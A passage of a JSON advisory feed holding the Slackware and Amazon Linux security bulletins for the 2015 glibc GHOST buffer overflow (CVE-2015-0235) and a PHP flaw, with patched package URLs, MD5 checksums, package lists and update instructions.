14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/glibc-2.15-x86_64-9_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/glibc-i18n-2.15-x86_64-9_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/glibc-profile-2.15-x86_64-9_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/glibc-solibs-2.15-x86_64-9_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/glibc-zoneinfo-2014j-noarch-1.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-2.17-i486-10_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-i18n-2.17-i486-10_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-profile-2.17-i486-10_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-solibs-2.17-i486-10_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-zoneinfo-2014j-noarch-1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-2.17-x86_64-10_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-i18n-2.17-x86_64-10_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-profile-2.17-x86_64-10_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-solibs-2.17-x86_64-10_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-zoneinfo-2014j-noarch-1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/glibc-solibs-2.20-i486-2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/glibc-zoneinfo-2014j-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-2.20-i486-2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-i18n-2.20-i486-2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-profile-2.20-i486-2.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/glibc-solibs-2.20-x86_64-2.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/glibc-zoneinfo-2014j-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-2.20-x86_64-2.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-i18n-2.20-x86_64-2.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-profile-2.20-x86_64-2.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 packages:\n41402c65ebdef4b022c799131556ef7e glibc-2.9-i486-7_slack13.0.txz\n7095e3cd743af0179ea14b9bff81e3f4 glibc-i18n-2.9-i486-7_slack13.0.txz\n901d50b809ed84837ff45b2ca7838bb3 glibc-profile-2.9-i486-7_slack13.0.txz\n421a711b7cf1be2df2421ae5cd50b217 glibc-solibs-2.9-i486-7_slack13.0.txz\n61278ba5a904a7474e9b0b64b0daab97 glibc-zoneinfo-2014j-noarch-1.txz\n\nSlackware x86_64 13.0 packages:\nd4266628a8db63751f3f55b8bc2e2162 glibc-2.9-x86_64-7_slack13.0.txz\nb6161a0e23da771c5c6903605e49e403 glibc-i18n-2.9-x86_64-7_slack13.0.txz\nb8026d61e3849cce26539def0b665ca3 glibc-profile-2.9-x86_64-7_slack13.0.txz\n1f7f4cf57d44d75d4ef2786152f33403 glibc-solibs-2.9-x86_64-7_slack13.0.txz\n61278ba5a904a7474e9b0b64b0daab97 glibc-zoneinfo-2014j-noarch-1.txz\n\nSlackware 13.1 packages:\n03e0d0224efe8bc794b5be0454612a1e glibc-2.11.1-i486-9_slack13.1.txz\nfabbdd8d7f14667c7a2dc7ede87b5510 glibc-i18n-2.11.1-i486-9_slack13.1.txz\n1c1d86a9dabe329c3d30796188b66ebe glibc-profile-2.11.1-i486-9_slack13.1.txz\ne2ebe08bb02550c69202a6f973ef7e47 glibc-solibs-2.11.1-i486-9_slack13.1.txz\n61278ba5a904a7474e9b0b64b0daab97 glibc-zoneinfo-2014j-noarch-1.txz\n\nSlackware x86_64 13.1 packages:\nc00de492a4842e3a86101028e8cc03f0 glibc-2.11.1-x86_64-9_slack13.1.txz\n9657c55f39b233333e48d08acee9ed78 glibc-i18n-2.11.1-x86_64-9_slack13.1.txz\nada2d7f7b7ffdfd7a4407696ad714e48 glibc-profile-2.11.1-x86_64-9_slack13.1.txz\nb3c393e74aafbb5276cea1217dfcd1aa glibc-solibs-2.11.1-x86_64-9_slack13.1.txz\n61278ba5a904a7474e9b0b64b0daab97 glibc-zoneinfo-2014j-noarch-1.txz\n\nSlackware 13.37 packages:\n16615e6ef8311b928e3a05e0b7f3e505 glibc-2.13-i486-8_slack13.37.txz\n319dfc0cbdaf8410981195fffb1371c6 glibc-i18n-2.13-i486-8_slack13.37.txz\n6964339495ab981d17ba27cd5878a400 glibc-profile-2.13-i486-8_slack13.37.txz\n1834abd11fab02725e897040bbead56f glibc-solibs-2.13-i486-8_slack13.37.txz\n61278ba5a904a7474e9b0b64b0daab97 glibc-zoneinfo-2014j-noarch-1.txz\n\nSlackware x86_64 13.37 packages:\n1753003d261831ac235445e23a9f9870 glibc-2.13-x86_64-8_slack13.37.txz\n8aa103984bb2cb293072a022dd9144f2 glibc-i18n-2.13-x86_64-8_slack13.37.txz\na56e90a34eec8f60e265c45d05490a57 glibc-profile-2.13-x86_64-8_slack13.37.txz\nc6f684ea049e4091b96d15606eb454d1 glibc-solibs-2.13-x86_64-8_slack13.37.txz\n61278ba5a904a7474e9b0b64b0daab97 glibc-zoneinfo-2014j-noarch-1.txz\n\nSlackware 14.0 packages:\na2fadb666bfdf5c7c4c9792cbf34785d glibc-2.15-i486-9_slack14.0.txz\n3b3626f4a170a603af36ca60c7840fa6 glibc-i18n-2.15-i486-9_slack14.0.txz\nad237d138bb874e57c4080071d27e798 glibc-profile-2.15-i486-9_slack14.0.txz\nf07d37e52014cec80e43d883eda516ae glibc-solibs-2.15-i486-9_slack14.0.txz\n61278ba5a904a7474e9b0b64b0daab97 glibc-zoneinfo-2014j-noarch-1.txz\n\nSlackware x86_64 14.0 packages:\na5d02d71a230b6daa39d2ebefd8a6548 glibc-2.15-x86_64-9_slack14.0.txz\n62c30b615e38ba63cafb8053383eabde glibc-i18n-2.15-x86_64-9_slack14.0.txz\n152d094ab6bc4c7f763dd4ad1a53784c glibc-profile-2.15-x86_64-9_slack14.0.txz\nb256163bb179d1aebfda5f45270a0580 glibc-solibs-2.15-x86_64-9_slack14.0.txz\n61278ba5a904a7474e9b0b64b0daab97 glibc-zoneinfo-2014j-noarch-1.txz\n\nSlackware 14.1 packages:\n8f2fb91bb39d8a1db3bd6510295e6b1e glibc-2.17-i486-10_slack14.1.txz\n8d179820a827a4dce028b57d3fa39237 glibc-i18n-2.17-i486-10_slack14.1.txz\n19a4824c6ff8792a1166a38ceff824e0 glibc-profile-2.17-i486-10_slack14.1.txz\n417dede2ae464059002b6fcc2048f942 glibc-solibs-2.17-i486-10_slack14.1.txz\n61278ba5a904a7474e9b0b64b0daab97 glibc-zoneinfo-2014j-noarch-1.txz\n\nSlackware x86_64 14.1 packages:\n490ce11a13439e30ff312769cc4fabb1 glibc-2.17-x86_64-10_slack14.1.txz\ncd145e0d6a12b15d5282d7d1b3de92ed glibc-i18n-2.17-x86_64-10_slack14.1.txz\n93aea777dd41dc1c631dce1cf252bf14 glibc-profile-2.17-x86_64-10_slack14.1.txz\n6b759039a5b3f8c88b3753e722ded78e glibc-solibs-2.17-x86_64-10_slack14.1.txz\n61278ba5a904a7474e9b0b64b0daab97 glibc-zoneinfo-2014j-noarch-1.txz\n\nSlackware -current packages:\n395d4ad5fb71c4a56a500c3e51d07c8b a/glibc-solibs-2.20-i486-2.txz\n61278ba5a904a7474e9b0b64b0daab97 a/glibc-zoneinfo-2014j-noarch-1.txz\n3ca2827446e66d0d2d0e0bc8c55ba1ed l/glibc-2.20-i486-2.txz\n94105b1a10c42ce0995f8ace6b4f06a8 l/glibc-i18n-2.20-i486-2.txz\nfcc2ad4f5aad3a7d704d708a170c5351 l/glibc-profile-2.20-i486-2.txz\n\nSlackware x86_64 -current packages:\n25129dd9dfed8a8e834c87ba40c1ef17 a/glibc-solibs-2.20-x86_64-2.txz\n61278ba5a904a7474e9b0b64b0daab97 a/glibc-zoneinfo-2014j-noarch-1.txz\nb8ff5e308769d8e4eddccd9940058d5c l/glibc-2.20-x86_64-2.txz\n8c3db9286aa93346d25ffad38178137b l/glibc-i18n-2.20-x86_64-2.txz\n21f2a62d975b433f570cd5129cdc21fb l/glibc-profile-2.20-x86_64-2.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg glibc-*", "modified": "2015-01-28T12:35:21", "published": "2015-01-28T12:35:21", "id": "SSA-2015-028-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.1260924", "title": "glibc", "type": "slackware", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2019-05-29T17:22:52", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nA heap-based buffer overflow was found in glibc's __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application.\n\n \n\n\n#### Special notes:\n\nBecause of the exceptional nature of this security event, we have backfilled our 2014.03 and 2013.09 Amazon Linux AMI repositories with new glibc packages that fix [CVE-2015-0235 __](<https://access.redhat.com/security/cve/CVE-2015-0235>).\n\nFor 2014.09 Amazon Linux AMIs, _glibc-2.17-55.93.amzn1_ addresses the CVE. Running _yum clean all_ followed by _yum update glibc_ will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs [\"locked\"](<https://aws.amazon.com/amazon-linux-ami/faqs/#lock>) to the 2014.03 repositories, the same _glibc-2.17-55.93.amzn1_ addresses the CVE. Running _yum clean all_ followed by _yum update glibc_ will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs [\"locked\"](<https://aws.amazon.com/amazon-linux-ami/faqs/#lock>) to the 2013.09 repositories, _glibc-2.12-1.149.49.amzn1_ addresses the CVE. Running _yum clean all_ followed by _yum update glibc_ will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs [\"locked\"](<https://aws.amazon.com/amazon-linux-ami/faqs/#lock>) to the 2013.03, 2012.09, 2012.03, or 2011.09 repositories, run _yum clean all_ followed by _yum --releasever=2013.09 update glibc_ to install the updated glibc package. You should reboot your instance after installing the update.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a version of the Amazon Linux AMI that was part of our public beta, and we encourage you to move to a newer version of the Amazon Linux AMI as soon as possible.\n\n \n**Affected Packages:** \n\n\nglibc\n\n \n**Issue Correction:** \nRun _yum update glibc_ to update your system. Note that you may need to run _yum clean all_ first. Once this update has been applied, _reboot your instance to ensure that all processes and daemons that link against glibc are using the updated version_. On new instance launches, you should still reboot after cloud-init has [automatically applied](<https://aws.amazon.com/amazon-linux-ami/faqs/#auto_update>) this update.\n\n \n\n\n**New Packages:**\n \n \n i686: \n glibc-static-2.17-55.93.amzn1.i686 \n glibc-common-2.17-55.93.amzn1.i686 \n nscd-2.17-55.93.amzn1.i686 \n glibc-devel-2.17-55.93.amzn1.i686 \n glibc-2.17-55.93.amzn1.i686 \n glibc-utils-2.17-55.93.amzn1.i686 \n glibc-debuginfo-2.17-55.93.amzn1.i686 \n glibc-headers-2.17-55.93.amzn1.i686 \n glibc-debuginfo-common-2.17-55.93.amzn1.i686 \n \n src: \n glibc-2.17-55.93.amzn1.src \n \n x86_64: \n glibc-utils-2.17-55.93.amzn1.x86_64 \n nscd-2.17-55.93.amzn1.x86_64 \n glibc-debuginfo-2.17-55.93.amzn1.x86_64 \n glibc-headers-2.17-55.93.amzn1.x86_64 \n glibc-debuginfo-common-2.17-55.93.amzn1.x86_64 \n glibc-common-2.17-55.93.amzn1.x86_64 \n glibc-static-2.17-55.93.amzn1.x86_64 \n glibc-2.17-55.93.amzn1.x86_64 \n glibc-devel-2.17-55.93.amzn1.x86_64 \n \n \n", "modified": "2015-01-28T19:57:00", "published": "2015-01-28T19:57:00", "id": "ALAS-2015-473", "href": "https://alas.aws.amazon.com/ALAS-2015-473.html", "title": "Critical: glibc", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:22:51", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nA heap-based buffer overflow was found in glibc's __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. ([CVE-2015-0235 __](<https://access.redhat.com/security/cve/CVE-2015-0235>))\n\nUse after free vulnerability was reported in PHP DateTimeZone. ([CVE-2015-0273 __](<https://access.redhat.com/security/cve/CVE-2015-0273>))\n\n \n**Affected Packages:** \n\n\nphp54\n\n \n**Issue Correction:** \nRun _yum update php54_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php54-5.4.38-1.66.amzn1.i686 \n php54-pspell-5.4.38-1.66.amzn1.i686 \n php54-mcrypt-5.4.38-1.66.amzn1.i686 \n php54-debuginfo-5.4.38-1.66.amzn1.i686 \n php54-common-5.4.38-1.66.amzn1.i686 \n php54-mysql-5.4.38-1.66.amzn1.i686 \n php54-soap-5.4.38-1.66.amzn1.i686 \n php54-mssql-5.4.38-1.66.amzn1.i686 \n php54-mbstring-5.4.38-1.66.amzn1.i686 \n php54-tidy-5.4.38-1.66.amzn1.i686 \n php54-enchant-5.4.38-1.66.amzn1.i686 \n php54-mysqlnd-5.4.38-1.66.amzn1.i686 \n php54-xml-5.4.38-1.66.amzn1.i686 \n php54-pgsql-5.4.38-1.66.amzn1.i686 \n php54-fpm-5.4.38-1.66.amzn1.i686 \n php54-cli-5.4.38-1.66.amzn1.i686 \n php54-imap-5.4.38-1.66.amzn1.i686 \n php54-intl-5.4.38-1.66.amzn1.i686 \n php54-process-5.4.38-1.66.amzn1.i686 \n php54-snmp-5.4.38-1.66.amzn1.i686 \n php54-devel-5.4.38-1.66.amzn1.i686 \n php54-bcmath-5.4.38-1.66.amzn1.i686 \n php54-recode-5.4.38-1.66.amzn1.i686 \n php54-dba-5.4.38-1.66.amzn1.i686 \n php54-ldap-5.4.38-1.66.amzn1.i686 \n php54-embedded-5.4.38-1.66.amzn1.i686 \n php54-gd-5.4.38-1.66.amzn1.i686 \n php54-pdo-5.4.38-1.66.amzn1.i686 \n php54-xmlrpc-5.4.38-1.66.amzn1.i686 \n php54-odbc-5.4.38-1.66.amzn1.i686 \n \n src: \n php54-5.4.38-1.66.amzn1.src \n \n x86_64: \n php54-ldap-5.4.38-1.66.amzn1.x86_64 \n php54-dba-5.4.38-1.66.amzn1.x86_64 \n php54-pspell-5.4.38-1.66.amzn1.x86_64 \n php54-common-5.4.38-1.66.amzn1.x86_64 \n php54-devel-5.4.38-1.66.amzn1.x86_64 \n php54-pdo-5.4.38-1.66.amzn1.x86_64 \n php54-mcrypt-5.4.38-1.66.amzn1.x86_64 \n php54-mysql-5.4.38-1.66.amzn1.x86_64 \n php54-recode-5.4.38-1.66.amzn1.x86_64 \n php54-5.4.38-1.66.amzn1.x86_64 \n php54-enchant-5.4.38-1.66.amzn1.x86_64 \n php54-mssql-5.4.38-1.66.amzn1.x86_64 \n php54-intl-5.4.38-1.66.amzn1.x86_64 \n php54-odbc-5.4.38-1.66.amzn1.x86_64 \n php54-bcmath-5.4.38-1.66.amzn1.x86_64 \n php54-imap-5.4.38-1.66.amzn1.x86_64 \n php54-snmp-5.4.38-1.66.amzn1.x86_64 \n php54-debuginfo-5.4.38-1.66.amzn1.x86_64 \n php54-gd-5.4.38-1.66.amzn1.x86_64 \n php54-tidy-5.4.38-1.66.amzn1.x86_64 \n php54-fpm-5.4.38-1.66.amzn1.x86_64 \n php54-xmlrpc-5.4.38-1.66.amzn1.x86_64 \n php54-embedded-5.4.38-1.66.amzn1.x86_64 \n php54-process-5.4.38-1.66.amzn1.x86_64 \n php54-cli-5.4.38-1.66.amzn1.x86_64 \n php54-pgsql-5.4.38-1.66.amzn1.x86_64 \n php54-mysqlnd-5.4.38-1.66.amzn1.x86_64 \n php54-soap-5.4.38-1.66.amzn1.x86_64 \n php54-xml-5.4.38-1.66.amzn1.x86_64 \n php54-mbstring-5.4.38-1.66.amzn1.x86_64 \n \n \n", "modified": "2015-03-13T10:03:00", "published": "2015-03-13T10:03:00", "id": "ALAS-2015-493", "href": "https://alas.aws.amazon.com/ALAS-2015-493.html", "title": "Critical: php54", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
